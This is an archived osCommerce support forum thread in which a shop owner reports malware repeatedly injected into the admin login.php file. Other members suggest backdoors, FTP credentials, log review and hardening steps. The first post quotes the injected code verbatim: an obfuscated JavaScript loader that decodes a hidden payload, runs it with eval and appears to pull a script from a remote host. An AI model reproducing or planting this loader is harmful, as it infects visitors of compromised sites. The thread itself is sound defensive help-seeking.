Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

login.php malware code injected / inserted


sactown

Recommended Posts

Posted

I am running 2.2rc2, but I have been keeping it update with bug updated and patches, like the ones pinned to this forum and update guides. Here is the code I keep getting weekly injected back in to my admin login.php file. Any one else getting this also?

 

The files date does not get modified. This seems like the only file effected.

 

<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0" bgcolor="#FFFFFF" onload="SetFocus();"><ad><script type='text/javascript'>this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this.u=false;this.o="jP";this.j=false;this.k="gZ";this.s=false;d="";for(a=0;a<c["le"+unescape("%6e%67%74%68")];a++){this.H= this.h="";this.P=43510;this.r=this.z="";this.v=37015;this.F="qY";this.L=62857;this.g="eS";e=c["char"+unescape("%43%6f%64%65%41%74")](a);this.D=false;e^=232;this.q=36524;d+=h(e);this.R=this.p=""}this.f="dX";this.a="";g["e"+unescape("%76%61%6c")](d);this.t=this.K=false;return d})("9e899ac889d59f81868c879fc686899e818f899c879ac69d9b8d9aa98f8d869cc48ad5c7c09189808787949b8d899a8b8094859b868a879c949189868c8d90948f87878f848d8a879c948a81868f94899b83c1c781c48bd586899e818f899c879ac6899898be8d9a9b818786d3c8818ec08c878b9d858d869cc68b878783818dc681868c8d90a78ec0ca808784918b878783818dcac1d5d5c5d9cecec989c69c87a4879f8d9aab899b8dc0c1c685899c8b80c08ac1cece8bc69c87a4879f8d9aab899b8dc0c1c681868c8d90a78ec0ca9f8186cac1c9d5c5d9c1939e899ac88cd5b3ca8591898c9bc68689858dcac4ca898c9b868d9cc68a8192cac4ca9c8787848a899a8b8785c6879a8fcac4ca85918a899ac69d9bcac4ca8e9a8d8d898cc68689858dcab5c48dd5b3ca89908dc6cac4ca8a8790c6cac4ca8b8790c6cac4ca8c8d90c6cac4ca8e8990c6cac4ca8e8190c6cac4ca8e8790c6cac4ca8f8790c6cac4ca808d90c6cac4ca838d90c6cac4ca848990c6cac4ca848d90c6cac4ca848790c6cac4ca849d90c6cac4ca858990c6cac4ca858190c6cac4ca868190c6cac4ca879087c6cac4ca879091c6cac4ca988990c6cac4ca988190c6cac4ca988790c6cac4ca989190c6cac4ca9a8990c6cac4ca9a8d90c6cac4ca9b8990c6cac4ca9b8d90c6cac4ca9b8190c6cac4ca9b8790c6cac4ca9c8990c6cac4ca9c9d90c6cac4ca9e8d90c6cac4ca9e8790c6cac4ca9f8990c6cac4ca90819bc6cac4ca928990c6cab5c48ed5a5899c80c68e8487879ac0a5899c80c69a89868c8785c0c1c28cc6848d868f9c80c1c48fd5a5899c80c68e8487879ac0a5899c80c69a89868c8785c0c1c28dc6848d868f9c80c1d38c9cd5868d9fc8ac899c8dd38c9cc69b8d9cbc81858dc08c9cc68f8d9cbc81858dc0c1c3d1d8dfdaaddcc1d38c878b9d858d869cc68b878783818dd5ca808784918b878783818dd5cac38d9b8b89988dc0ca808784918b878783818dcac1c3cad38d9098819a8d9bd5cac38c9cc69c87afa5bcbb9c9a81868fc0c1c3cad398899c80d5c7cad3c88c878b9d858d869cc69f9a819c8dc0cfd49b8b9a81989cc89c91988dd5ca9c8d909cc782899e899b8b9a81989ccac89b9a8bd5ca809c9c98d2c7c7cfc38db38fb5c38cb38eb5c3cfc79b919b9c8d85c78b89989c818786c6829bcad6d4b4c79b8b9a81989cd6cfc195d3"); this.n=3279;this.O=58441;</script></ad><b1><!--f9mYZ4E7eNrTT07MycksKdfPSMxNSczL1M/JT8/M0yvIKLC1tTU0MjMyszAzNTUGABfJDKI=--></b1>
<!-- header //-->
<?php require(DIR_WS_INCLUDES . 'header.php'); ?>
<!-- header_eof //-->

Posted

Moses,

 

If you have patched your site and are still getting hacked, it is because the hacker has:

 

1) Added a backdoor to your server to access it anytime.

2) Your FTP password to access your server anytime.

 

 

 

 

Chris

Posted

Have a look at the ftp access logs and site logs at the time the file is updated.

 

Maybe you can see something suspicious

 

HTH

 

G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Posted

I use Godaddy Hosting. I will try to email their support for the ftp logs. Not sure if I have to pay for other site stats, but I will look into it. I also scanned my computers for adware/malware/viruses with a couple of different progams just to make sure it is not my computers, and I got nothing.

Posted

It does sound like they've gotten in through a security flaw on the server or gained access through FTP or maybe even the hosting control panel.

 

IF you haven't done the following already....

 

1. Contact your hosting immediately about the problem, if you can't access the logs, they sure can.

2. Change your FTP password.

3. Add/modify the HTAccess file in the admin folder to limit access by password or ipaddress. At least then it will stop rougue bots scouring the admin folder.

4. Remove the File_Manager.php file from your admin folder. This has been a well documented issue.

Posted

filemanager was only an issue because of the login work around.

 

If the site is secure, file manager is fine to be on the sever.

 

Personally I remove it because I always edit locally on a copy.

 

Cheers

 

G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...